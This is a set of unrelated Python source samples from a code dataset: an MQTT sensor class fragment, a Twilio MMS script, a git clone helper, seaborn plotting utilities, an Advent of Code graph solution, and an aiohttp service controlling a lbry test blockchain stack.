                            d["IPAddress"] = ip_address
                        if friendly_name != "":
                            d["FriendlyName"] = friendly_name
                if device_not_exist:
                    MQTT_DEVICES.append(
                        {
                            "topic": topic,
                            "FriendlyName": friendly_name,
                            "IPAddress": ip_address,
                            "Sensors": sensors,
                        }
                    )
            except Exception as e:
                _LOGGER.info("Error: " + str(e))
            self.async_schedule_update_ha_state()

        # self._sub_state = await subscription.async_subscribe_topics(
        #     self.hass, self._sub_state,
        #     {'state_topic': {'topic': self._config.get(CONF_STATE_TOPIC),
        #                      'msg_callback': message_received,
        #                      'qos': self._config.get(CONF_QOS)}})

    async def async_will_remove_from_hass(self):
        """Unsubscribe when removed."""
        self._sub_state = await subscription.async_unsubscribe_topics(
            self.hass, self._sub_state
        )
        await MqttAttributes.async_will_remove_from_hass(self)
        await MqttAvailability.async_will_remove_from_hass(self)

    @callback
    def value_is_expired(self, *_):
        """Triggered when value is expired."""
        self._expiration_trigger = None
        self._state = STATE_UNKNOWN
        self.async_schedule_update_ha_state()

    @property
    def should_poll(self):
        """No polling needed."""
        return False

    @property
    def name(self):
        """Return the name of the sensor."""
        return self._config.get(CONF_NAME)

    @property
    def unit_of_measurement(self):
        """Return the unit this state is expressed in."""
        return self._config.get(CONF_UNIT_OF_MEASUREMENT)

    @property
    def force_update(self):
        """Force update."""
        return self._config.get(CONF_FORCE_UPDATE)

    @property
    def state(self):
        """Return the state of the entity.

        Always a single space: the entity deliberately shows no value.
        """
        return " "

    @property
    def device_state_attributes(self):
        """Return the state attributes."""
        return self._attributes

    @property
    def unique_id(self):
        """Return a unique ID."""
        return self._unique_id

    @property
    def icon(self):
        """Return the icon."""
        return self._config.get(CONF_ICON)

    @property
    def device_class(self) -> Optional[str]:
        """Return the device class of the sensor."""
        return self._config.get(CONF_DEVICE_CLASS)
| StarcoderdataPython |
1652153 | import os
from twilio.rest import Client
def send_mms():
    """Send one MMS (picture plus caption) through the Twilio REST API.

    Credentials are read from the TWILIO_ACCOUNT_SID and TWILIO_AUTH_TOKEN
    environment variables; the phone-number placeholders below must be
    filled in before running.
    """
    account_sid = os.environ['TWILIO_ACCOUNT_SID']
    auth_token = os.environ['TWILIO_AUTH_TOKEN']
    client = Client(account_sid, auth_token)

    message = client.messages.create(
        body='I am as cute as baby yoda :)',
        media_url='https://helios-i.mashable.com/imagery/articles/06Qx8phppzGdXs2CVE7QlwP/hero-image.fill.size_1248x702.v1623391437.jpg',
        from_='+1<YOUR_TWILIO_NUMBER>',
        to='+1<TARGET_PHONE_NUMBER>'
    )
    # Echo the message SID so the send can be looked up in the console.
    print(message.sid)


if __name__ == '__main__':
    send_mms()
7176 | import os
import option
import utility
import grapeMenu
import grapeGit as git
import grapeConfig
class Clone(option.Option):
    """ grape-clone
    Clones a git repo and configures it for use with git.
    Usage: grape-clone <url> <path> [--recursive] [--allNested]
    Arguments:
    <url>      The URL of the remote repository
    <path>     The directory where you want to clone the repo to.
    Options:
    --recursive Recursively clone submodules.
    --allNested Get all nested subprojects.
    """
    # NOTE: the class docstring above is the docopt usage spec and is parsed
    # at runtime — do not edit it casually.

    def __init__(self):
        super(Clone, self).__init__()
        # Menu key and section under which this option is listed.
        self._key = "clone"
        self._section = "Getting Started"

    # Clones the requested repo into a new local working copy.
    def description(self):
        return "Clone a repo and configure it for grape"

    def execute(self, args):
        """Clone <url> into <path>, then configure the new clone for grape.

        After cloning, checks out a sensible initial public branch
        (develop, else master, else the first configured public branch)
        and runs the grape "config" menu option.
        """
        remotepath = args["<url>"]
        destpath = args["<path>"]
        rstr = "--recursive" if args["--recursive"] else ""
        utility.printMsg("Cloning %s into %s %s" % (remotepath, destpath, "recursively" if args["--recursive"] else ""))
        git.clone(" %s %s %s" % (rstr, remotepath, destpath))
        utility.printMsg("Clone succeeded!")
        # All subsequent grape/git operations run inside the new clone.
        os.chdir(destpath)
        grapeConfig.read()
        # ensure you start on a reasonable publish branch
        menu = grapeMenu.menu()
        config = grapeConfig.grapeConfig()
        publicBranches = config.getPublicBranchList()
        if publicBranches:
            if "develop" in publicBranches:
                initialBranch = "develop"
            elif "master" in publicBranches:
                initialBranch = "master"
            else:
                initialBranch = publicBranches[0]
            menu.applyMenuChoice("checkout", args=[initialBranch])
        # Optionally pull in every nested subproject during configuration.
        if args["--allNested"]:
            configArgs = ["--uv","--uvArg=--allNestedSubprojects"]
        else:
            configArgs = []
        return menu.applyMenuChoice("config", configArgs)

    def setDefaultConfig(self, config):
        # This option contributes no default configuration entries.
        pass
| StarcoderdataPython |
4841399 | import numpy as np
import pandas as pd
from pandas.api.types import is_numeric_dtype
import matplotlib.pyplot as plt
from matplotlib import rcParams
import seaborn as sns
from .utils import *
from .utils import _make_iterable, _is_iter
def _plot_grid(plot_func, data, x, y, color=None, **kwargs):
    """Dispatch to a 1D grid of panels or a 2D grid, based on which inputs vary.

    Exactly one iterable among ``x``, ``y`` and ``color`` produces a 1D grid
    split along that dimension; two iterables produce a 2D grid (currently
    unimplemented); three iterables are rejected with an AssertionError.
    A fully scalar call yields a single panel with the colour wrapped in a
    one-element list, as the 1D plotter expects.
    """
    MSG_ONLY_2D = "Only 2 of 3 dimensions can be iterables to create grids: x axis, y axis, or color."
    # Determine which of the three dimensions are iterable. The original
    # nested if/elif dispatch contained unreachable branches (e.g. testing
    # _is_iter(x) inside the `elif _is_iter(y)` arm); counting is equivalent.
    varying = [
        axis for axis, value in (("x", x), ("y", y), ("color", color))
        if _is_iter(value)
    ]
    assert len(varying) <= 2, MSG_ONLY_2D
    if len(varying) == 0:
        return _plot_grid_from_1d(plot_func, data, x, y, [color], "color", **kwargs)
    if len(varying) == 1:
        return _plot_grid_from_1d(plot_func, data, x, y, color, varying[0], **kwargs)
    return _plot_2d_grid(plot_func, data, x, y, color, **kwargs)
def _plot_grid_from_1d(
    plot_func,
    data,
    x,
    y,
    color=None,
    split_axis="color",  # x, y, or color
    ncols=4,
    zero_line_x=False,
    zero_line_y=False,
    linewidth=0,
    zero_linewidth=1,
    legend=True,
    legend_prop=None,
    palette=None,
    sharex=False,
    sharey=False,
    modifier=None,
    **kwargs,
):
    """Draw a grid of seaborn panels, one per value of the varying dimension.

    ``split_axis`` names which of x/y/color is the iterable that varies
    across panels.  Panels are laid out in at most ``ncols`` columns;
    ``modifier`` is an optional callback invoked per panel with
    ``split_var``, ``color_var`` and the axes.  Returns the last axes drawn.
    """
    # Translate integer factor indices into factor names.
    x = maybe_factor_indices_to_factors(x)
    y = maybe_factor_indices_to_factors(y)
    color = maybe_factor_indices_to_factors(color)
    # Define the variable for the split
    # and plot axes labels
    # NOTE(review): the values below were already converted above, so the
    # second maybe_factor_indices_to_factors pass is presumably redundant.
    if split_axis == "color":
        split_vars = maybe_factor_indices_to_factors(_make_iterable(color))
        x_label = x
        y_label = y
    elif split_axis == "x":
        split_vars = maybe_factor_indices_to_factors(_make_iterable(x))
        y_label = y
    elif split_axis == "y":
        split_vars = maybe_factor_indices_to_factors(_make_iterable(y))
        x_label = x
    # Set default colour to black if none set
    if "c" not in kwargs and (color is None or color == [None]):
        kwargs["color"] = "black"
    # seaborn legend mode: only draw per-panel legends when colouring by a var.
    legend_str = "brief" if (legend and color is not None) else False
    # Figure out rows & columns for the grid with plots
    ncols = min(ncols, len(split_vars))
    nrows = int(np.ceil(len(split_vars) / ncols))
    fig, axes = plt.subplots(
        nrows,
        ncols,
        sharex=sharex,
        sharey=sharey,
        figsize=(
            ncols * rcParams["figure.figsize"][0],
            nrows * rcParams["figure.figsize"][1],
        ),
    )
    # Normalise `axes` to a 2-D array even for single-row/column grids.
    if ncols == 1:
        axes = np.array(axes).reshape(-1, 1)
    if nrows == 1:
        axes = np.array(axes).reshape(1, -1)
    for i, split_var in enumerate(split_vars):
        # When splitting by colour, each panel is coloured by its own split value.
        color_var = color if split_axis != "color" else split_var
        ri = i // ncols
        ci = i % ncols
        # data_ = data.sort_values(color) if color is not None and color != [None] else data
        with sns.axes_style("ticks"), sns.color_palette(palette or "Set2"):
            g = plot_func(
                x=x if split_axis != "x" else split_var,
                y=y if split_axis != "y" else split_var,
                data=data,
                hue=color_var,
                linewidth=linewidth,
                legend=legend_str,
                palette=palette,
                ax=axes[ri, ci],
                **kwargs,
            )
            # Otherwise sns.violinplot still plots the legend
            if legend_str is False:
                try:
                    g.get_legend().remove()
                except AttributeError:
                    # No legend was drawn for this panel.
                    pass
            if modifier:
                modifier(split_var=split_var, color_var=color_var, ax=g)
            sns.despine(offset=10, trim=True, ax=g)
            # Integer split values denote factor indices; label them Factor<N>.
            if split_axis == "x":
                x_label = f"Factor{split_var+1}" if isinstance(x, int) else split_var
            elif split_axis == "y":
                y_label = f"Factor{split_var+1}" if isinstance(y, int) else split_var
            g.set(
                xlabel=f"{x_label}",
                ylabel=f"{y_label}",
                title=split_var,
            )
            if legend and color_var:
                if is_numeric_dtype(data[color_var]):
                    # Numeric hue: replace the legend with a colorbar scaled
                    # to the per-group means of the hue column.
                    means = data.groupby(color_var)[color_var].mean()
                    norm = plt.Normalize(means.min(), means.max())
                    cmap = (
                        palette
                        if palette is not None
                        else sns.cubehelix_palette(as_cmap=True)
                    )
                    sm = plt.cm.ScalarMappable(cmap=cmap, norm=norm)
                    sm.set_array([])
                    try:
                        g.figure.colorbar(sm, ax=axes[ri, ci])
                        g.get_legend().remove()
                    except Exception:
                        warn("Cannot make a proper colorbar")
                else:
                    # Categorical hue: put the legend outside the axes.
                    g.legend(
                        bbox_to_anchor=(1.05, 1),
                        loc=2,
                        borderaxespad=0.0,
                        prop=legend_prop,
                    )
            # Optional dashed reference lines through zero.
            if zero_line_y:
                axes[ri, ci].axhline(
                    0, ls="--", color="lightgrey", linewidth=zero_linewidth, zorder=0
                )
            if zero_line_x:
                axes[ri, ci].axvline(
                    0, ls="--", color="lightgrey", linewidth=zero_linewidth, zorder=0
                )
    # Remove unused axes
    for i in range(len(split_vars), ncols * nrows):
        ri = i // ncols
        ci = i % ncols
        fig.delaxes(axes[ri, ci])
    plt.tight_layout()
    return g
def _plot_2d_grid(*args, **kwargs):
raise NotImplementedError
| StarcoderdataPython |
1765896 | <filename>2017/12.py
#!/usr/bin/env python3
import sys
def dfs(graph, seen, nobe):
    """Add every node reachable from ``nobe`` to the ``seen`` set (in place)."""
    stack = [nobe]
    while stack:
        current = stack.pop()
        if current in seen:
            continue
        seen.add(current)
        # Push neighbours; already-seen ones are skipped when popped.
        stack.extend(graph[current])
def main(args):
    """Advent of Code 2017 day 12: connected components of the pipe graph.

    Reads lines of the form "<id> <-> <id>, <id>, ..." from stdin, prints
    the size of the component containing program "0", then the total number
    of components.
    """
    lines = [line.strip() for line in sys.stdin]
    graph = {}
    for line in lines:
        node, neighbours = line.split(" <-> ")
        graph[node] = set(neighbours.split(", "))
    # Part 1: size of the component containing "0".
    seen = set()
    dfs(graph, seen, "0")
    print(len(seen))
    # Part 2: count components, starting from the one already flooded.
    components = 1
    for node in graph:
        if node not in seen:
            components += 1
            dfs(graph, seen, node)
    print(components)


if __name__ == '__main__':
    sys.exit(main(sys.argv))
| StarcoderdataPython |
3235938 | import asyncio
import logging
from aiohttp.web import Application, WebSocketResponse, json_response
from aiohttp.http_websocket import WSMsgType, WSCloseCode
from lbry.wallet.util import satoshis_to_coins
from .node import Conductor
PORT = 7954
class WebSocketLogHandler(logging.Handler):
    """Logging handler that forwards each record through a websocket callback."""

    def __init__(self, send_message):
        super().__init__()
        # Callable receiving a JSON-serialisable dict for each log record.
        self.send_message = send_message

    def emit(self, record):
        try:
            payload = {
                'type': 'log',
                'name': record.name,
                'message': self.format(record)
            }
            self.send_message(payload)
        except Exception:
            # Standard logging convention: report, never raise from emit().
            self.handleError(record)
class ConductorService:
    """HTTP/WebSocket control server wrapped around a lbry Conductor stack.

    Exposes POST endpoints to start the stack, mine blocks, send funds and
    query the miner balance, plus a websocket log/status feed at /log.
    """

    def __init__(self, stack: Conductor, loop: asyncio.AbstractEventLoop) -> None:
        self.stack = stack
        self.loop = loop
        self.app = Application()
        self.app.router.add_post('/start', self.start_stack)
        self.app.router.add_post('/generate', self.generate)
        self.app.router.add_post('/transfer', self.transfer)
        self.app.router.add_post('/balance', self.balance)
        self.app.router.add_get('/log', self.log)
        # Open websocket connections; used to broadcast log/status messages.
        self.app['websockets'] = set()
        self.app.on_shutdown.append(self.on_shutdown)
        # NOTE(review): Application.make_handler() is a deprecated aiohttp
        # API — confirm the pinned aiohttp version still supports it.
        self.handler = self.app.make_handler()
        self.server = None

    async def start(self):
        # Bind on all interfaces at the module-level PORT.
        self.server = await self.loop.create_server(
            self.handler, '0.0.0.0', PORT
        )
        print('serving on', self.server.sockets[0].getsockname())

    async def stop(self):
        # Shut down the blockchain/spv/wallet stack first, then the web app.
        await self.stack.stop()
        self.server.close()
        await self.server.wait_closed()
        await self.app.shutdown()
        await self.handler.shutdown(60.0)
        await self.app.cleanup()

    async def start_stack(self, _):
        """Start blockchain, SPV and wallet nodes (idempotent per component)."""
        #set_logging(
        #    self.stack.ledger_module, logging.DEBUG, WebSocketLogHandler(self.send_message)
        #)
        # `X or await start_X()` only starts components not already running.
        self.stack.blockchain_started or await self.stack.start_blockchain()
        self.send_message({'type': 'service', 'name': 'blockchain', 'port': self.stack.blockchain_node.port})
        self.stack.spv_started or await self.stack.start_spv()
        self.send_message({'type': 'service', 'name': 'spv', 'port': self.stack.spv_node.port})
        self.stack.wallet_started or await self.stack.start_wallet()
        self.send_message({'type': 'service', 'name': 'wallet', 'port': self.stack.wallet_node.port})
        # Push a status broadcast on every new header or transaction.
        self.stack.wallet_node.ledger.on_header.listen(self.on_status)
        self.stack.wallet_node.ledger.on_transaction.listen(self.on_status)
        return json_response({'started': True})

    async def generate(self, request):
        """Mine `blocks` (form field, default 1) on the regtest chain."""
        data = await request.post()
        blocks = data.get('blocks', 1)
        await self.stack.blockchain_node.generate(int(blocks))
        return json_response({'blocks': blocks})

    async def transfer(self, request):
        """Send `amount` coins to `address` (defaults to a fresh wallet address)."""
        data = await request.post()
        address = data.get('address')
        if not address and self.stack.wallet_started:
            address = await self.stack.wallet_node.account.receiving.get_or_create_usable_address()
        if not address:
            raise ValueError("No address was provided.")
        amount = data.get('amount', 1)
        txid = await self.stack.blockchain_node.send_to_address(address, amount)
        if self.stack.wallet_started:
            # Block until the wallet actually observes this transaction.
            await self.stack.wallet_node.ledger.on_transaction.where(
                lambda e: e.tx.id == txid and e.address == address
            )
        return json_response({
            'address': address,
            'amount': amount,
            'txid': txid
        })

    async def balance(self, _):
        return json_response({
            'balance': await self.stack.blockchain_node.get_balance()
        })

    async def log(self, request):
        """Upgrade to a websocket and register it for log/status broadcasts."""
        web_socket = WebSocketResponse()
        await web_socket.prepare(request)
        self.app['websockets'].add(web_socket)
        try:
            async for msg in web_socket:
                if msg.type == WSMsgType.TEXT:
                    if msg.data == 'close':
                        await web_socket.close()
                elif msg.type == WSMsgType.ERROR:
                    print('web socket connection closed with exception %s' %
                          web_socket.exception())
        finally:
            # Always deregister, whatever way the connection ended.
            self.app['websockets'].remove(web_socket)
        return web_socket

    @staticmethod
    async def on_shutdown(app):
        # Politely close every client socket during application shutdown.
        for web_socket in app['websockets']:
            await web_socket.close(code=WSCloseCode.GOING_AWAY, message='Server shutdown')

    async def on_status(self, _):
        """Broadcast chain height and balances to all connected websockets."""
        if not self.app['websockets']:
            return
        self.send_message({
            'type': 'status',
            'height': self.stack.wallet_node.ledger.headers.height,
            'balance': satoshis_to_coins(await self.stack.wallet_node.account.get_balance()),
            'miner': await self.stack.blockchain_node.get_balance()
        })

    def send_message(self, msg):
        # Fan `msg` out to every open websocket as a fire-and-forget task.
        for web_socket in self.app['websockets']:
            self.loop.create_task(web_socket.send_json(msg))
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.